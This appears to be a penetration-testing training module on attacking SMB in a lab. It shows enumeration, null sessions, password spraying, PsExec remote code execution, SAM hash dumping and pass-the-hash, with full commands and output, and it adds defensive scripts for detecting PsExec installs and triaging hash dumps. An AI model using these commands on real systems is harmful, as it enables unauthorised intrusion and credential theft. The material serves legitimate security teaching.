# Attacking SMB

## Enumeration

Depending on the SMB implementation and the operating system, `Nmap` will return different information. Keep in mind that when targeting a Windows host, version information is usually not included in the Nmap scan results; instead, Nmap tries to guess the OS version. We will often need other scans to identify whether the target is vulnerable to a particular exploit, and we will cover searching for known vulnerabilities later in this section. For now, let's scan TCP ports 139 and 445.

```shell-session
eldeim@htb[/htb]$ sudo nmap 10.129.14.128 -sV -sC -p139,445

Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-19 15:15 CEST
Nmap scan report for 10.129.14.128
Host is up (0.00024s latency).

PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 00:00:00:00:00:00 (VMware)

Host script results:
|_nbstat: NetBIOS name: HTB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-09-19T13:16:04
|_  start_date: N/A
```

The Nmap scan reveals essential information about the target:

* SMB version (Samba smbd 4.6.2)
* Hostname HTB
* Operating system is Linux (inferred from the Samba SMB implementation)

***

## Misconfigurations

SMB can be configured not to require authentication, which is often called a `null session`. With a null session, we can log in to the system with no username or password.

### **Anonymous Authentication**

If we find an SMB server that does not require a username and password or find valid credentials, we can get a list of shares, usernames, groups, permissions, policies, services, etc. Most tools that interact with SMB allow null session connectivity, including `smbclient`, `smbmap`, `rpcclient`, or `enum4linux`. Let's explore how we can interact with file shares and RPC using null authentication.

### **File Share**

Using `smbclient`, we can display a list of the server's shares with the option `-L`, and using the option `-N`, we tell `smbclient` to use the null session.

```shell-session
eldeim@htb[/htb]$ smbclient -N -L //10.129.14.128

        Sharename       Type      Comment
        -------      --     -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        notes           Disk      CheckIT
        IPC$            IPC       IPC Service (DEVSM)
SMB1 disabled no workgroup available
```

`Smbmap` is another tool that helps us enumerate network shares and access associated permissions. An advantage of `smbmap` is that it provides a list of permissions for each shared folder.

```shell-session
eldeim@htb[/htb]$ smbmap -H 10.129.14.128

[+] IP: 10.129.14.128:445     Name: 10.129.14.128                                   
        Disk                                                    Permissions     Comment
        --                                                   ---------    -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       IPC Service (DEVSM)
        notes                                                   READ, WRITE     CheckIT
```

Using `smbmap` with the `-r` or `-R` (recursive) option, one can browse the directories:

```shell-session
eldeim@htb[/htb]$ smbmap -H 10.129.14.128 -r notes

[+] Guest session       IP: 10.129.14.128:445    Name: 10.129.14.128                           
        Disk                                                    Permissions     Comment
        --                                                   ---------    -------
        notes                                                   READ, WRITE
        .\notes\*
        dr--r--r               0 Mon Nov  2 00:57:44 2020    .
        dr--r--r               0 Mon Nov  2 00:57:44 2020    ..
        dr--r--r               0 Mon Nov  2 00:57:44 2020    LDOUJZWBSG
        fw--w--w             116 Tue Apr 16 07:43:19 2019    note.txt
        fr--r--r               0 Fri Feb 22 07:43:28 2019    SDT65CB.tmp
        dr--r--r               0 Mon Nov  2 00:54:57 2020    TPLRNSMWHQ
        dr--r--r               0 Mon Nov  2 00:56:51 2020    WDJEQFZPNO
        dr--r--r               0 Fri Feb 22 07:44:02 2019    WindowsImageBackup
```

From the above example, the permissions are set to `READ` and `WRITE`, which allows us to download and upload files.

```shell-session
eldeim@htb[/htb]$ smbmap -H 10.129.14.128 --download "notes\note.txt"

[+] Starting download: notes\note.txt (116 bytes)
[+] File output to: /htb/10.129.14.128-notes_note.txt
```

```shell-session
eldeim@htb[/htb]$ smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"

[+] Starting upload: test.txt (20 bytes)
[+] Upload complete.
```

## **Remote Procedure Call (RPC)**

We can use the `rpcclient` tool with a null session to enumerate a workstation or Domain Controller.

The `rpcclient` tool offers us many different commands to execute specific functions on the SMB server to gather information or modify server attributes like a username. We can use this [cheat sheet from the SANS Institute](https://www.willhackforsushi.com/sec504/SMB-Access-from-Linux.pdf) or review the complete list of all these functions found on the [man page](https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html) of the `rpcclient`.

```shell-session
eldeim@htb[/htb]$ rpcclient -U'%' 10.10.110.17

rpcclient $> enumdomusers

user:[mhope] rid:[0x641]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]
```

`Enum4linux` is another utility that supports null sessions, and it utilizes `nmblookup`, `net`, `rpcclient`, and `smbclient` to automate some common enumeration from SMB targets such as:

* Workgroup/Domain name
* Users information
* Operating system information
* Groups information
* Shared folders
* Password policy information

The [original tool](https://github.com/CiscoCXSecurity/enum4linux) was written in Perl and [rewritten by Mark Lowe in Python](https://github.com/cddmp/enum4linux-ng).

```shell-session
eldeim@htb[/htb]$ ./enum4linux-ng.py 10.10.11.45 -A -C

ENUM4LINUX - next generation

 ==========================
|    Target Information    |
 ==========================
[*] Target ........... 10.10.11.45
[*] Username ......... ''
[*] Random Username .. 'noyyglci'
[*] Password ......... ''

 ====================================
|    Service Scan on 10.10.11.45     |
 ====================================
[*] Checking LDAP (timeout: 5s)
[-] Could not connect to LDAP on 389/tcp: connection refused
[*] Checking LDAPS (timeout: 5s)
[-] Could not connect to LDAPS on 636/tcp: connection refused
[*] Checking SMB (timeout: 5s)
[*] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS (timeout: 5s)
[*] SMB over NetBIOS is accessible on 139/tcp

 ===================================================                            
|    NetBIOS Names and Workgroup for 10.10.11.45    |
 ===================================================                                                                                         
[*] Got domain/workgroup name: WORKGROUP
[*] Full NetBIOS names information:
- WIN-752039204 <00> -          B <ACTIVE>  Workstation Service
- WORKGROUP     <00> -          B <ACTIVE>  Workstation Service
- WIN-752039204 <20> -          B <ACTIVE>  Workstation Service
- MAC Address = 00-0C-29-D7-17-DB
...
 ========================================
|    SMB Dialect Check on 10.10.11.45    |
 ========================================

<SNIP>
```

## **Brute Forcing and Password Spray**

When brute-forcing, we try as many passwords as possible against an account, but it can lock out an account if we hit the threshold. We can use brute-forcing and stop before reaching the threshold if we know it. Otherwise, we do not recommend using brute force.

Password spraying is a better alternative since we can target a list of usernames with one common password to avoid account lockouts. We can try more than one password if we know the account lockout threshold. Typically, two to three attempts are safe, provided we wait 30-60 minutes between attempts. Let's explore the tool [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) that includes the ability to execute password spraying.

With CrackMapExec (CME), we can target multiple IPs, using numerous users and passwords. Let's explore an everyday use case for password spraying. To perform a password spray against one IP, we can use the option `-u` to specify a file with a user list and `-p` to specify a password. This will attempt to authenticate every user from the list using the provided password.

```shell-session
eldeim@htb[/htb]$ cat /tmp/userlist.txt

Administrator
jrodriguez 
admin
<SNIP>
jurena
```

```shell-session
eldeim@htb[/htb]$ crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' --local-auth

SMB         10.10.110.17 445    WIN7BOX  [*] Windows 10.0 Build 18362 (name:WIN7BOX) (domain:WIN7BOX) (signing:False) (SMBv1:False)
SMB         10.10.110.17 445    WIN7BOX  [-] WIN7BOX\Administrator:Company01! STATUS_LOGON_FAILURE 
SMB         10.10.110.17 445    WIN7BOX  [-] WIN7BOX\jrodriguez:Company01! STATUS_LOGON_FAILURE 
SMB         10.10.110.17 445    WIN7BOX  [-] WIN7BOX\admin:Company01! STATUS_LOGON_FAILURE 
SMB         10.10.110.17 445    WIN7BOX  [-] WIN7BOX\eperez:Company01! STATUS_LOGON_FAILURE 
SMB         10.10.110.17 445    WIN7BOX  [-] WIN7BOX\amone:Company01! STATUS_LOGON_FAILURE 
SMB         10.10.110.17 445    WIN7BOX  [-] WIN7BOX\fsmith:Company01! STATUS_LOGON_FAILURE 
SMB         10.10.110.17 445    WIN7BOX  [-] WIN7BOX\tcrash:Company01! STATUS_LOGON_FAILURE 

<SNIP>

SMB         10.10.110.17 445    WIN7BOX  [+] WIN7BOX\jurena:Company01! (Pwn3d!) 
```

> Note: By default, CME will exit after a successful login is found. Using the `--continue-on-success` flag will continue spraying even after a valid password is found. It is very useful for spraying a single password against a large user list. Additionally, if we are targeting a non-domain-joined computer, we will need to use the option `--local-auth`. For a more detailed study of Password Spraying, see the Active Directory Enumeration & Attacks module.

## **Remote Code Execution (RCE)**

We can download PsExec from the [Microsoft website](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec), or we can use one of several Linux implementations:

* [Impacket PsExec](https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py) - Python PsExec like functionality example using [RemComSvc](https://github.com/kavika13/RemCom).
* [Impacket SMBExec](https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py) - A similar approach to PsExec without using [RemComSvc](https://github.com/kavika13/RemCom). The technique is described [here](https://web.archive.org/web/20190515131124/https://www.optiv.com/blog/owning-computers-without-shell-access). This implementation goes one step further, instantiating a local SMB server to receive the output of the commands. This is useful when the target machine does NOT have a writeable share available.
* [Impacket atexec](https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py) - This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.
* [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) - includes an implementation of `smbexec` and `atexec`.
* [Metasploit PsExec](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/smb/psexec.md) - Ruby PsExec implementation.

### **Impacket PsExec**

To use `impacket-psexec`, we need to provide the domain/username, the password, and the IP address of our target machine. For more detailed information, we can use the Impacket help:

```shell-session
eldeim@htb[/htb]$ impacket-psexec -h

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

usage: psexec.py [-h] [-c pathname] [-path PATH] [-file FILE] [-ts] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-keytab KEYTAB] [-dc-ip ip address]
                 [-target-ip ip address] [-port [destination port]] [-service-name service_name] [-remote-binary-name remote_binary_name]
                 target [command ...]

PSEXEC like functionality example using RemComSvc.

positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>
  command               command (or arguments if -c is used) to execute at the target (w/o path) - (default:cmd.exe)

optional arguments:
  -h, --help            show this help message and exit
  -c pathname           copy the filename for later execution, arguments are passed in the command option
  -path PATH            path of the command to execute
  -file FILE            alternative RemCom binary (be sure it doesn't require CRT)
  -ts                   adds timestamp to every logging output
  -debug                Turn DEBUG output ON

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the
                        ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)
  -keytab KEYTAB        Read keys for SPN from keytab file

connection:
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve
                        it
  -port [destination port]
                        Destination port to connect to SMB Server
  -service-name service_name
                        The name of the service used to trigger the payload
  -remote-binary-name remote_binary_name
                        This will be the name of the executable uploaded on the target
```

To connect to a remote machine with a local administrator account, using `impacket-psexec`, you can use the following command:

```shell-session
eldeim@htb[/htb]$ impacket-psexec administrator:'Password123!'@10.10.110.17

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.110.17.....
[*] Found writable share ADMIN$
[*] Uploading file EHtJXgng.exe
[*] Opening SVCManager on 10.10.110.17.....
[*] Creating service nbAc on 10.10.110.17.....
[*] Starting service nbAc.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19041.1415]
(c) Microsoft Corporation. All rights reserved.


C:\Windows\system32>whoami && hostname

nt authority\system
WIN7BOX
```

The same options apply to `impacket-smbexec` and `impacket-atexec`.
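The session above also shows the footprint `impacket-psexec` leaves on the target: a random 8-letter executable uploaded to `ADMIN$` (i.e. `C:\Windows`) and a random 4-letter service name created through the Service Control Manager. The following is an added example (not code from the page or from Impacket): a heuristic run over constructed lines shaped like Windows System event 7045 (service installed), reusing the `nbAc` / `EHtJXgng.exe` names from the session above; `PSEXESVC` is the service name the Sysinternals PsExec client installs.

```python
"""Heuristic for PsExec-style service installs (added example).

Lines are constructed to resemble the fields of Windows System event 7045
("A service was installed in the system"). The nbAc / EHtJXgng.exe pair
repeats the names impacket-psexec generated in the session above; PSEXESVC
is the service name the Sysinternals PsExec client installs.
"""
import re

SAMPLE_7045 = r"""
host=WIN7BOX name=nbAc path=%SystemRoot%\EHtJXgng.exe account=LocalSystem start=demand
host=WIN7BOX name=PSEXESVC path=%SystemRoot%\PSEXESVC.exe account=LocalSystem start=demand
host=WIN10BOX name=Spooler path=%SystemRoot%\System32\spoolsv.exe account=LocalSystem start=auto
host=WIN10BOX name=BackupAgent path="C:\Program Files\Backup\agent.exe" account=LocalSystem start=auto
"""

FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')
KNOWN_PSEXEC_SERVICES = {"PSEXESVC"}
RANDOM_SVC = re.compile(r"^[A-Za-z]{4}$")             # e.g. nbAc
RANDOM_EXE = re.compile(r"^[A-Za-z]{8}\.exe$", re.I)  # e.g. EHtJXgng.exe
ADMIN_SHARE_DIRS = {"%systemroot%", r"c:\windows"}    # what ADMIN$ maps to


def parse_7045(text):
    """Turn each constructed line into a dict of its key=value fields."""
    services = []
    for line in text.splitlines():
        if line.strip():
            services.append({k: v.strip('"') for k, v in FIELD.findall(line)})
    return services


def assess(service):
    """Return the list of reasons a service install looks PsExec-like."""
    reasons = []
    name = service["name"]
    directory, _, exe = service["path"].rpartition("\\")
    if name.upper() in KNOWN_PSEXEC_SERVICES:
        reasons.append("known PsExec service name")
    if RANDOM_SVC.match(name) and name not in (name.lower(), name.upper()):
        reasons.append("4-letter mixed-case service name, as in the session above")
    if RANDOM_EXE.match(exe) and directory.lower() in ADMIN_SHARE_DIRS:
        reasons.append("8-letter executable dropped in ADMIN$ (C:\\Windows)")
    return reasons


def flag_services(text):
    """Return (host, service name, reasons) for every flagged install."""
    flagged = []
    for svc in parse_7045(text):
        reasons = assess(svc)
        if reasons:
            flagged.append((svc["host"], svc["name"], reasons))
    return flagged
```

Service names and binaries are attacker-controlled (`-service-name`, `-remote-binary-name` in the help above), so treat this as one signal to correlate with the preceding `ADMIN$` write and the SCM connection, not as a complete detection.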

### **CrackMapExec**

Another tool we can use to run CMD or PowerShell is `CrackMapExec`. One advantage of `CrackMapExec` is the ability to run a command on multiple hosts at a time. To use it, we need to specify the protocol, `smb`, the IP address or IP address range, the option `-u` for the username, `-p` for the password, and the option `-x` to run cmd commands or uppercase `-X` to run PowerShell commands.

```shell-session
eldeim@htb[/htb]$ crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

SMB         10.10.110.17 445    WIN7BOX  [*] Windows 10.0 Build 19041 (name:WIN7BOX) (domain:.) (signing:False) (SMBv1:False)
SMB         10.10.110.17 445    WIN7BOX  [+] .\Administrator:Password123! (Pwn3d!)
SMB         10.10.110.17 445    WIN7BOX  [+] Executed command via smbexec
SMB         10.10.110.17 445    WIN7BOX  nt authority\system
```

> Note: If `--exec-method` is not defined, CrackMapExec will try to execute the atexec method; if it fails, you can try to specify `--exec-method smbexec`.

### **Enumerating Logged-on Users**

Imagine we are in a network with multiple machines. Some of them share the same local administrator account. In this case, we could use `CrackMapExec` to enumerate logged-on users on all machines within the same network `10.10.110.17/24`, which speeds up our enumeration process.

```shell-session
eldeim@htb[/htb]$ crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users

SMB         10.10.110.17 445    WIN7BOX  [*] Windows 10.0 Build 18362 (name:WIN7BOX) (domain:WIN7BOX) (signing:False) (SMBv1:False)
SMB         10.10.110.17 445    WIN7BOX  [+] WIN7BOX\administrator:Password123! (Pwn3d!)
SMB         10.10.110.17 445    WIN7BOX  [+] Enumerated loggedon users
SMB         10.10.110.17 445    WIN7BOX  WIN7BOX\Administrator             logon_server: WIN7BOX
SMB         10.10.110.17 445    WIN7BOX  WIN7BOX\jurena                    logon_server: WIN7BOX
SMB         10.10.110.21 445    WIN10BOX  [*] Windows 10.0 Build 19041 (name:WIN10BOX) (domain:WIN10BOX) (signing:False) (SMBv1:False)
SMB         10.10.110.21 445    WIN10BOX  [+] WIN10BOX\Administrator:Password123! (Pwn3d!)
SMB         10.10.110.21 445    WIN10BOX  [+] Enumerated loggedon users
SMB         10.10.110.21 445    WIN10BOX  WIN10BOX\demouser                logon_server: WIN10BOX
```

### **Extract Hashes from SAM Database**

The Security Account Manager (SAM) is a database file that stores users' password hashes. It can be used to authenticate local and remote users. If we get administrative privileges on a machine, we can extract the SAM database hashes for different purposes:

* Authenticate as another user.
* Password cracking: if we manage to crack the password, we can try to reuse it for other services or accounts.
* Pass-the-Hash, which we will discuss later in this section.

```shell-session
eldeim@htb[/htb]$ crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam

SMB         10.10.110.17 445    WIN7BOX  [*] Windows 10.0 Build 18362 (name:WIN7BOX) (domain:WIN7BOX) (signing:False) (SMBv1:False)
SMB         10.10.110.17 445    WIN7BOX  [+] WIN7BOX\administrator:Password123! (Pwn3d!)
SMB         10.10.110.17 445    WIN7BOX  [+] Dumping SAM hashes
SMB         10.10.110.17 445    WIN7BOX  Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
SMB         10.10.110.17 445    WIN7BOX  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.110.17 445    WIN7BOX  DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.110.17 445    WIN7BOX  WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:5717e1619e16b9179ef2e7138c749d65:::
SMB         10.10.110.17 445    WIN7BOX  jurena:1001:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
SMB         10.10.110.17 445    WIN7BOX  demouser:1002:aad3b435b51404eeaad3b435b51404ee:4c090b2a4a9a78b43510ceec3a60f90b:::
SMB         10.10.110.17 445    WIN7BOX  [+] Added 6 SAM hashes to the database
```

### **Pass-the-Hash (PtH)**

If we manage to get an NTLM hash of a user, and if we cannot crack it, we can still use the hash to authenticate over SMB with a technique called Pass-the-Hash (PtH). PtH allows an attacker to authenticate to a remote server or service using the underlying NTLM hash of a user's password instead of the plaintext password. We can use a PtH attack with any `Impacket` tool, `SMBMap`, `CrackMapExec`, among other tools. Here is an example of how this would work with `CrackMapExec`:

```shell-session
eldeim@htb[/htb]$ crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE

SMB         10.10.110.17 445    WIN7BOX  [*] Windows 10.0 Build 19041 (name:WIN7BOX) (domain:WIN7BOX) (signing:False) (SMBv1:False)
SMB         10.10.110.17 445    WIN7BOX  [+] WIN7BOX\Administrator:2B576ACBE6BCFDA7294D6BD18041B8FE (Pwn3d!)
```
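The SAM dump and the Pass-the-Hash run above both come down to what is in those `user:rid:lmhash:nthash:::` lines: the `-H` value passed to CME is the Administrator NT hash from the dump, and it works on any host whose local Administrator shares that password. The following is an added triage script (not code from the page or from CrackMapExec) that parses such a dump, flags empty-password accounts and stored LM hashes, and finds NT hashes shared across hosts. The WIN7BOX lines are copied from the dump above; the WIN10BOX dump is constructed, consistent with the same Administrator password succeeding on both hosts earlier in the section.

```python
"""Triage a pwdump-style SAM dump, user:rid:lmhash:nthash::: (added example).

WIN7BOX lines are the dump shown above; WIN10BOX is a constructed second
host. The two constants are well-known values: the LM field written when no
LM hash is stored, and the NT hash of the empty string.
"""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

DUMPS = {
    "WIN7BOX": """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:5717e1619e16b9179ef2e7138c749d65:::
jurena:1001:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
demouser:1002:aad3b435b51404eeaad3b435b51404ee:4c090b2a4a9a78b43510ceec3a60f90b:::
""",
    "WIN10BOX": """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
demouser:1002:aad3b435b51404eeaad3b435b51404ee:4c090b2a4a9a78b43510ceec3a60f90b:::
""",
}


def parse_pwdump(text, host):
    """Parse pwdump lines for one host; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if not (rid.isdigit() and len(lm) == 32 and len(nt) == 32):
            continue
        records.append({"host": host, "user": user, "rid": int(rid), "lm": lm, "nt": nt})
    return records


def triage(records):
    """Group the dump into the findings a defender acts on first:
    empty passwords, legacy LM hashes, and one NT hash reused across hosts
    (the local-admin reuse that lets a Pass-the-Hash login hop between boxes)."""
    by_nt = defaultdict(list)
    for r in records:
        by_nt[r["nt"]].append((r["host"], r["user"]))
    return {
        "empty_password": sorted({r["user"] for r in records if r["nt"] == EMPTY_NT}),
        "lm_stored": sorted({r["user"] for r in records if r["lm"] != EMPTY_LM}),
        "shared_nt": {h: sorted(v) for h, v in by_nt.items()
                      if len(v) > 1 and h != EMPTY_NT},
    }
```

Accounts under `shared_nt` are the ones to reset first (or to move to LAPS-style unique local-admin passwords); the empty-password entries here are the built-in disabled accounts, which is normal, but a non-built-in user in that list is a finding.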

